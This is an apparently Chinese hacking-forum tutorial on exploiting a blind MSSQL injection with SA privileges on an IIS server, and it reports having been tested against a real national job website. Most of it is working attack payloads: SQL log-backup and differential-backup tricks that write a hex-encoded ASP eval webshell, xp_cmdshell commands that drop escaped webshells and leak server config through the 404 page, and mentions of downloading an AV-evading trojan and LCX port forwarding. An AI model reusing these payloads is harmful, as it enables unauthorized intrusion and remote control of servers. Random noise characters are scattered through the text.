sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
0 C  _  q7 w8 F, ]6 a, N4 v1 A
9 O; D  I  \( k  K; l$ o3 a! h! K, v
: O! t8 x6 c, z4 B" o( V$ G' ]- b                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
) u9 j9 W# I' G
                                                                 
* D: ]* k7 g- ?2 j$ h# `' v' y                                                                 
3 z# X8 s4 i1 j' Y8 U2 b                                                                  论坛： http://www.90team.net/



; s& G9 F/ j" g0 |8 |& v友情检测国家人才网


内容：MSSQL注入SA权限不显错模式下的入侵
9 {  \7 n' o# e, W

& I+ \# }9 A+ }4 P$ M/ P6 q一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

- t7 ]9 h2 W+ L# I7 \我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
  V. u6 |, H6 A9 z% u
) ?+ t' V+ _& g0 h+ i* _
这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

, S, |5 _  o2 U思路：
! |6 _6 }8 X0 E& U" a) `0 D
首先：
0 A9 p9 }# C1 c  p* I( G
6 R9 j, \( o3 P6 s通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
' w$ U* k. O  P% [7 c
# L3 P$ g" o3 [: D+ {+ o% _1 U  j1.日志备份获得Webshell

2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。
2 o9 l' B* Q& t/ M. q6 L3 j( ^
5.直接下载LCX将服务器端口转发出来
  B" l6 B' y( P! I) S- ]/ T
6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
+ D. `9 D& _6 Y7 d

$ X0 F% P$ `' Y  M! K
: o$ i- p8 g# X  ], y2 d4 n在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，

我直接演示后面一个方法
! H1 G; q& B, s+ y3 A- o

分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
5 G" ~& K$ n4 a* R
; |- o0 Y7 I) v- P; I- b8 ^
% }2 C1 R7 D8 i6 C" M" X( D$ ~3 Y; o

/ p$ i  O; i( \# _; ^  k8 T◆日志备份：


; H) k, F8 C/ s1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
: ]8 y6 `' w" S9 D# V- k
2. 插入数据
9 C4 r" |3 O& `  n  t6 z6 [4 h# l;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
3. 备份并获得文件，删除临时表
9 ^0 q- W4 Y4 C: ];Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--


+ U+ K: g' b2 G% a% }: j
◆数据库差异备份

0 `" J9 q- n* _+ j# Z（1. 进行差异备份准备工作

;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
; ^- R# J& H" H; a% Q' \/ M7 s
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
9 g& l. `5 u9 m0 D" X+ w

（2. 将数据写入到数据库
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
$ F/ ^* N* @4 i$ N0 d
0 n3 Z" {/ }" f, q6 {/ o0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
0 M+ ~# a$ I# x# }! D
9 Z) }! K' E0 k( m2 w; F8 N, @, J3. 备份数据库并清理临时文件

;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
, e) S$ s% |8 ~2 a' Q, L/ E
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
9 @3 I: I# ?  |& c" L; }7 T


; Y. t$ [4 V/ e- G0 ?. k# g& s用^转义字符来写ASP(一句话木马)文件的方法:   

) z6 R+ E7 u$ M. j! B1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

5 }! z2 P6 i* s) _% p9 ^2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

5 }/ D- s9 w* U3 C读取IIS配置信息获取web路径
/ L3 j" c; D( r+ Z7 _
     
% X3 h* L7 A2 F) i( H6 r  f& M     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

执行命令
" ^( X0 s! l& [+ q* x) i0 u     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--

( u8 w# _/ y' c0 M' G9 y) F
" b; n# }9 _( D1 A4 ]% D% O
) a2 x$ O) L* p# y5 u

+ N! X) N  Q2 t; Z( P
9 P$ \1 C$ R/ k) l



" m' Q) a" ^: n) z7 [

2 U0 |# H, Y$ u



" B; E1 m2 }7 m$ Y, A; ~
  U4 N( r5 q2 F8 Q. N) J8 d
; Q* E  [2 e: v& s
& |# _- w. z/ X) H" d


) S, \3 r. D. `  u
( J& i! H1 |  D- L# ?# Y7 X


' ]7 o, ]. P2 r
' H. M. l7 b' j, `) Y

) v& ~  ]4 z& W: u, p2 A
# I" m! c2 ~. O& p1 ]5 f
7 C2 \# z" Q- u4 {
( `& J5 t# W/ |$ L8 [5 f5 \
$ J% P4 u4 ^; K# Z

, C) B+ ~7 Y8 \4 o' h4 z7 o

' ?3 S0 y  d* k4 f


' M. ]# n, Z) x( L7 h

# S, Z% o9 O4 K3 p& ?& N! p
: d$ M( A- T- E7 R
1 ]2 G! R5 `6 M9 Z" u! O, n4 v
3 U8 G! h; U) I: G